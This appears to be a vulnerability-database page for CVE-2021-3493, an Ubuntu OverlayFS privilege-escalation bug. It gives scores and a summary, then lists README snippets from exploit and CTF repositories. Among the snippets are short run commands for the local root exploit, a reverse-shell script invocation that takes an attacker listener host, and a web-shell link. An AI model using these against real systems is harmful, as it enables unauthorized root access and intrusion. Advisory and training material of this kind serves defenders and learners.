7.8
CVSSv3

CVE-2021-3493

Published: 17/04/2021 Updated: 07/07/2023
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 7.8 | Impact Score: 5.9 | Exploitability Score: 1.8
VMScore: 649
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The overlayfs implementation in the linux kernel did not properly validate with respect to user namespaces the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

canonical ubuntu linux

Exploits

This Metasploit module exploits a vulnerability in Ubuntu's implementation of overlayfs The vulnerability is the result of failing to verify the ability of a user to set the attributes in a running executable Specifically, when Overlayfs sends the set attributes data to the underlying file system via vfs_setxattr, it fails to first verify the dat ...

Github Repositories

CVE-2021-3493 Ubuntu OverlayFS Local Privesc (Interactive Bash Shell & Execute Command Entered)

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respect to user namespaces A local attacker could use this to gain elevated privileges, due to a patch carried in Ubuntu to allow unprivileged overlayfs mounts

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 ctrsploit [kənˈteɪnər splɔɪt] , follows sploit-spec v043 Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploi

This repo contains Machines and Notes for practicing for EJPTv1/2 exam

eJPT_Prep Hey N1NJ10 👋 This repo contains Machines and Notes for practicing for EJPTv1/2 exam and if you wanna to intract with a community friends you can Join to this Telegram channel

Rapport Be Root Prérequis pour ce rapport Premièrement dans les exemples ci-dessous l'utilisation du compte utilisateur linux www-data sera faite Cet utilisateur a donc des droits restreints sur la majorité du serveur hormis la partie Web sudo -i <-- Permet de passer root sudo -u www-data bash <-- Permet de se connecter sur cet utilisat

Collection of Linux Kernel exploits for CTF.

Linux kernal Exploits This repo is a collection of kernal exploits Sources githubcom/briskets/CVE-2021-3493 githubcom/UncleJ4ck/CVE-2021-41091 githubcom/xkaneiki/CVE-2023-0386 githubcom/leesh3288/CVE-2023-4911 Disclaimer I am not the author of any of this exploit

Analytics CVE-2023-38646 zhuanlanzhihucom/p/647355511 CVE-2021-3493 githubcom/briskets/CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

2021 kernel vulnerability in Ubuntu.

overlayFS CVE-2021-3493 OverlayFs OverlayFS es un módulo del kernel de Linux que permite al sistema combinar varios puntos de montaje en uno, para que pueda acceder a todos los archivos de cada uno dentro de una estructura de directorio Sobre la vulnerabilidad Hace poco SSD-Discloure lanzó un PoC para un exploit del kernel de Ubuntu (link) Esta vulnerabilidad fu

Ubuntu OverlayFS Local Privesc

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

⚡️ Information Security Modules This is my public repository on GitHub about my entire evolution process within the information security market Rust Studies Ctf Write-ups Bug Bounty Reports CVEs found Projects 🔥 Contact me If you want to talk to me, this is the only place so far where you can talk to me 📌 Python Studies Here I share with you my progress in Rust s

This repo contains Machines and Notes for practicing for EJPTv1/2 exam

eJPT_Prep Hey N1NJ10 👋 This repo contains Machines and Notes for practicing for EJPTv1/2 exam and if you wanna to intract with a community friends you can Join to this Telegram channel

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit chmod +x exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with r

A penetration toolkit for container environment

ctrsploit: A penetration toolkit for container environment 中文文档 ctrsploit [kənˈteɪnər splɔɪt] Why ctrsploit see here Pre-Built Release githubcom/ctrsploit/ctrsploit/releases Self Build Build in Container make binary && ls -lah bin/release Build in Local make build-ctrsploit

⚡️ Information Security Modules This is my public repository on GitHub about my entire evolution process within the information security market Rust Studies Ctf Write-ups Bug Bounty Reports CVEs found Projects 🔥 Contact me If you want to talk to me, this is the only place so far where you can talk to me 📌 Python Studies Here I share with you my progress in Rust s

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit chmod +x exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with r

CVE-2021-3493 Ubuntu漏洞

CVE-2021-3493

CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Usage gcc exploitc -o exploit /exploit Description "Ubuntu specific issue in the overlayfs file system in the Linux kernel where it did not properly validate the application of file system capabilities with respe

Tracking interesting Linux (and UNIX) malware. Send PRs

E: we have a duplicate: blogsygniaco/revealing-emperor-dragonfly-a-chinese-ransomware-group E: we have a duplicate: twittercom/Unit42_Intel/status/1653760405792014336 linux-malware Rolling 7 day view of updates from this repo Submissions? Press/academia securelistcom/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ (#19) - Initial Access,

Personal "King of The Hill" toolkit.

KoTH-Tools Welcome to KoTH-Tools, a collection of custom tools used in TryHackMe's King of the Hill competition These tools are designed for use on Linux machines Table of Contents CVEs Directory Static Directory Monitor Directory Animations Directory Scripts Reverse Shells CVEs Directory This directory contains exploits for CVEs found in the machines CVE-2019-18634-

This is not my tools i just taken from google and github

Root Kernel tools CVE-2021-3493 Ubuntu OverlayFS Local Privesc Affected Versions Ubuntu 2010 Ubuntu 2004 LTS Ubuntu 1904 Ubuntu 1804 LTS Ubuntu 1604 LTS Ubuntu 1404 ESM Refference Usage gcc exploitc -o exploit /exploit Exploit 2 ( Pwnkit ) chmod +x pwnkit /pwnkit Exploit 3 Affected systems To remediate the vulnerabilit

TryHackMe Challange writeup for Couch room

Couch - TryHackMe Challenge Writeup Hatami Ra'is Bukhari (Althemier) Challenge link Scanning Nmap scan nmap -sC -sV -oN nmap/resulttxt $IP PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 72p2 Ubuntu 4ubuntu210 (Ubuntu Linux; protocol 20) | ssh-hostkey: | 2048 34:9d:39:09:34:30:4b:3d:a7:1e:df:eb:a3:b0:e5:aa (RSA) | 256 a4:2e:ef:3a:84:5d:21:1b:b9:d4:26:13

Analytics-htb-Rce #first clone the repository git clone githubcom/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirementstxt python3 CVE-2023-38646-Reverse-Shellpy -h #the before run reverse shell start netact listeiner and go back to run script as follows python3 CVE-2023-38646-Reverse-Shellpy --rhost {Target Ip address} --lhost {your ip-adress} -

Hospital GUI shell:githubcom/flozz/p0wny-shell/blob/master/shellphp Ubuntu提权:githubcom/briskets/CVE-2021-3493 GhostScript命令注入:githubcom/jakabakos/CVE-2023-36664-Ghostscript-command-injection